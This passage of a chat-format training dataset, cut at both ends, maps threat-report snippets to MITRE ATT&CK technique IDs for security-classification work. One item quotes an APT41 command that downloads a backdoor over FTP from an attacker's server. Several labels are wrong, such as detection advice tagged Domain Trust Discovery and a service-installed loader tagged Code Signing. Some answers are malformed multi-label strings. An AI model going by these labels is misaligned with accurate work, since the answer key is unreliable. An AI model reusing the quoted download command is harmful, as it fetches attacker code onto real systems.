- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BUBBLEWRAP can communicate using SOCKS."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Industroyer has used a Trojanized version of the Windows Notepad application for an additional backdoor persistence mechanism."
- },
- {
- "role": "assistant",
- "content": "T1554 - Compromise Host Software Binary"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GALLIUM leveraged valid accounts to maintain access to a victim network."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Starting on February 1, 2020, APT41 moved to using CVE-2019-19781 exploit payloads that initiate a download via the File Transfer Protocol (FTP). Specifically, APT41 executed the command ‘/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\\@66.42.98[.]220/bsd’, which connected to 66.42.98[.]220 over the FTP protocol, logged in to the FTP server with a username of ‘test’ and a password that we have redacted, and then downloaded an unknown payload named ‘bsd’ (which was likely a backdoor"
- },
- {
- "role": "assistant",
- "content": "T1071.002 - File Transfer Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The body of the POST request may contain files contained in the cabinet format"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chrommme can collect data from a local system."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "REDBALDKNIGHT’s use of steganography isn’t limited to Daserf. Based on their pdb strings, they’re both components of another REDBALDKNIGHT-related threat, XXMM (TROJ_KVNDM), a downloader Trojan that can also act as a first-stage backdoor with its capability to open a shell. While xxmm2_builder allows REDBALDKNIGHT to customize the settings of XXMM, xxmm2_ steganography is used to hide malicious code within an image file"
- },
- {
- "role": "assistant",
- "content": "T1001.002 - Data Obfuscation via Steganography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Inception has enumerated installed software on compromised systems."
- },
- {
- "role": "assistant",
- "content": "T1518 - Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Misdat is capable of deleting the backdoor file."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Night Dragon has used compromised VPN accounts to gain access to victim systems."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts', 'T1133 - External Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN8 has used remote code execution to download subsequent payloads."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Bazar loader has used dual-extension executable files such as PreviewReport.DOC.exe."
- },
- {
- "role": "assistant",
- "content": "T1036.007 - Masquerading: Double File Extension"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Saint Bot has established persistence by being copied to the Startup directory or through the `\\Software\\Microsoft\\Windows\\CurrentVersion\\Run` registry key."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NanHaiShu can gather information about the victim proxy server."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GravityRAT collects the volumes mapped on the system, and also steals files with the following extensions: .docx, .doc, .pptx, .ppt, .xlsx, .xls, .rtf, and .pdf."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has been known to stage files for exfiltration in a single location."
- },
- {
- "role": "assistant",
- "content": "T1074 - Data Staged"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has transferred files using the Intel® Active Management Technology (AMT) Serial-over-LAN (SOL) channel."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can be used to set up a proxy tunnel to allow remote host access to an infected host."
- },
- {
- "role": "assistant",
- "content": "T1090 - Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "adds a Registry Run key for persistence and adds a script in the Startup folder to deploy the payload."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Look for traffic to any of the related malicious domains identified in Appendix A. Use the signatures provided by FireEye to identify related activity. Make sure all credentials in an organization, including service accounts, are reset following a breach and that default passwords or those similar to previous passwords are not used. If you run an on-premise Exchange environment, consider adding alerting mechanisms to any EDR solutions for processes using the Exchange Management Shell PowerShell cmdlets listed in Appendix B. This may or may not be a valid detection approach depending on how frequently this is used within your organization. More generally, if the Exchange Management Shell is rarely used in a legitimate Administrative context, it may be worth investigating any historical use of this shell"
- },
- {
- "role": "assistant",
- "content": "T1482 - Domain Trust Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FlawedAmmyy has sent data collected from a compromised host to its C2 servers."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SynAck enumerates all running services."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Valak can collect sensitive mailing information from Exchange servers, including credentials and the domain certificate of an enterprise."
- },
- {
- "role": "assistant",
- "content": "T1114.002 - Email Collection: Remote Email Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Waterbear can find the presence of a specific security software."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "EvilGrab has the capability to capture keystrokes."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GALLIUM used Web shells and HTRAN for C2 and to exfiltrate data."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CALENDAR has a command to run cmd.exe to execute commands."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Derusbi collects current and parent process IDs."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ragnar Locker has been delivered as an unsigned MSI package that was executed with \"msiexec.exe\"."
- },
- {
- "role": "assistant",
- "content": "T1218.007 - Signed Binary Proxy Execution: Msiexec"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BBK can extract a malicious Portable Executable (PE) from a photo."
- },
- {
- "role": "assistant",
- "content": "T1027.003 - Steganography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "EvilBunny has used various API calls as part of its checks to see if the malware is running in a sandbox."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Grandoreiro can modify the binary ACL to prevent security tools from running."
- },
- {
- "role": "assistant",
- "content": "T1222.001 - File and Directory Permissions Modification: Windows File and Directory Permissions Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We also identified a Tomiris variant (internally named “SBZ”, MD5 51AA89452A9E57F646AB64BE6217788E) which acts as a filestealer, and uploads any recent file matching a hardcoded set of extensions (.doc, .docx, .pdf, .rar, etc. to the C2"
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Procmon shows the malicious module loaded using the regsvr32.exe process. Phase two: Payload Analysis The only module the XSL script loads is Irdsnhrxxxfery64, which is packed using the UPX packer"
- },
- {
- "role": "assistant",
- "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32', 'T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Astaroth encodes data using Base64 before sending it to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BADNEWS typically loads its DLL file into a legitimate signed Java or VMware executable."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Operation Wocao can download additional files to the infected system."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BRONZE BUTLER typically use \"ping\" and Net to enumerate systems."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Leviathan has created new email accounts for targeting efforts."
- },
- {
- "role": "assistant",
- "content": "T1585.002 - Email Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Like any other typical PoS malware, Pillowmint iterates a list of processes and process them two at a time. it uses the API OpenProcess() using the PROCESS_VM_READ and PROCESS_QUERY_INFORMATION flags to obtain a handle then reads the memory’s content via ReadProcessMemory() API two chunks at a time. Depending on the Pillowmint version, it may encrypt the stolen CC data with AES encryption algorithm + Base64. This is then written to a file named \"ldb_e.log\" in Windows System directory"
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Wocao, threat actors enumerated sessions and users on a remote host, and identified privileged users logged into a targeted system."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT33 has deployed a tool known as DarkComet to the Startup folder of a victim, and used Registry run keys to gain persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A SUGARDUMP variant has used HTTP for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Higaisa exfiltrated data over its C2 channel."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PROMETHIUM has created admin accounts on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1078.003 - Valid Accounts: Local Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Victim Registration SpeakUp uses POST and GET requests over HTTP to communicate with its main C&C which is the compromised website of speakupomaha[.]com"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ThreatNeedle relies on a victim to click on a malicious document for initial execution."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UNC2452 developed SUNSPOT, SUNBURST, TEARDROP, and Raindrop; SUNSPOT and SUNBURST were tailored to be incorporated into SolarWind's Orion software library."
- },
- {
- "role": "assistant",
- "content": "T1587.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 has conducted credential phishing campaigns with embedded links to attacker-controlled domains."
- },
- {
- "role": "assistant",
- "content": "T1598.003 - Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "11/1/18 sahro.bella7 trala.cosh2 Bishtr.cam47 Lobrek.chizh Cervot.woprov Table 5 Gathered C# Cannon samples As mentioned in our initial blog, the actor controlled email address acting as the C2 was sahro.bella7[at]post.cz, but all previous samples of Cannon used sym777.g[at]post.cz"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GALLIUM used WinRAR to compress and encrypt stolen data prior to exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1560.001 - Archive Collected Data: Archive via Utility"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gold Dragon checks for anti-malware products and processes."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This is the only instance we observed where a hardcoded Google Drive URL was included in RogueRobin, which may suggest that the author may have overlooked this during testing"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The shellcode loader was observed on one infected device as updater.exe with the Metasploit-style service name APTYnDS1ABEuUHEA, indicating that it was installed as a service"
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KeyBoy has a download and upload functionality."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ke3chang backdoor RoyalDNS established persistence through adding a service called \"Nwsapagent\"."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "malware SierraCharlie uses RDP for propagation."
- },
- {
- "role": "assistant",
- "content": "T1021.001 - Remote Services: Remote Desktop Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rover has functionality to remove Registry Run key persistence as a cleanup procedure."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "StrifeWater can download updates and auxiliary modules."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used Android backdoors capable of exfiltrating specific files directly from the infected devices."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OSX_OCEANLOTUS.D sets the main loader file’s attributes to hidden."
- },
- {
- "role": "assistant",
- "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can provide a remote shell."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "EvilGrab adds a Registry Run key for ctfmon.exe to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Agent.btz drops itself onto removable media devices and creates an autorun.inf file with an instruction to run that file. When the device is inserted into another system, it opens autorun.inf and loads the malware."
- },
- {
- "role": "assistant",
- "content": "T1091 - Replication Through Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Crutch has established persistence with a scheduled task impersonating the Outlook item finder."
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During this process, the adversary identifies data of interest from the network of the victim. This can be anything from file and directory-listings, configuration files, manuals, email stores in the guise of OST- and PST-files, file shares with intellectual property (IP), and data scraped from memory. If the data is small enough, it is exfiltrated through the command and control channel of the Cobalt Strike beacons. However, usually the data is compressed with WinRAR, staged on another system of the victim, and from there copied to a OneDrive-account controlled by the adversary"
- },
- {
- "role": "assistant",
- "content": "T1114.001 - Email Collection: Local Email Collection', 'T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Fysbis has installed itself as an autostart entry under \"~/.config/autostart/dbus-inotifier.desktop\" to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.013 - XDG Autostart Entries"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has used multiple types of encryption and encoding for their payloads, including AES, Caracachs, RC4, XOR, Base64, and other tricks such as creating aliases in code for Native API function names."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "encrypts C2 communications with RC4 as well as TLS."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The actor has used several notable techniques in these incidents such as sniffing passwords from Wi-Fi traffic, poisoning the NetBIOS Name Service, and spreading laterally via the EternalBlue exploit. APT28 Uses Malicious Document to Target Hospitality Industry FireEye has uncovered a malicious document sent in spear phishing emails to multiple companies in the hospitality industry, including hotels in at least seven European countries and one Middle Eastern country in early July"
- },
- {
- "role": "assistant",
- "content": "T1598.002 - Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The PowerShell implant used in the Olympics campaign was a stager based on the PowerShell Empire framework that created an encrypted channel to the attacker’s server"
- },
- {
- "role": "assistant",
- "content": "T1546.013 - Event Triggered Execution: PowerShell Profile', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses the keychaindump project to read securityd memory."
- },
- {
- "role": "assistant",
- "content": "T1555.002 - Securityd Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Additionally, the IP 211[.]72 [.]242[.]120 is one of the hosts for the domain microsoftmse[.]com, which has been used by several KIVARS variants"
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging', 'T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
